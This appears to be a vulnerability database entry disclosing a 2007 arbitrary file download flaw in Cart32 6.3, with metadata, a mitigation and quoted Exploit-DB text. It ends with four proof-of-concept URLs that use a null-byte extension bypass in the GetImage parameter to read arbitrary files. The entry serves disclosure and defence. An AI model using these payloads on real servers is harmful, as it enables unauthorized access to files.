header-logo
Suggest Exploit
vendor:
Cart32
by:
Unknown
5.5
CVSS
MEDIUM
Arbitrary File Download
22
CWE
Product Name: Cart32
Affected Version From: 6.3
Affected Version To: 6.3
Patch Exists: NO
Related CWE:
CPE: a:cart32:cart32:6.3
Metasploit:
Other Scripts:
Platforms Tested: Windows
2007

Arbitrary File Download Vulnerability in Cart32

The Cart32 application fails to sanitize user-supplied input, leading to an arbitrary file download vulnerability. An attacker can exploit this vulnerability to download arbitrary files within the context of the webserver process, potentially aiding in further attacks.

Mitigation:

Apply the latest patch or upgrade to a non-vulnerable version of Cart32. Additionally, ensure that user-supplied input is properly sanitized and validated.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25928/info

Cart32 is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.

This issue affects Cart32 6.3; prior versions are also vulnerable. 

http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gif
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.jpg
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pdf
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.png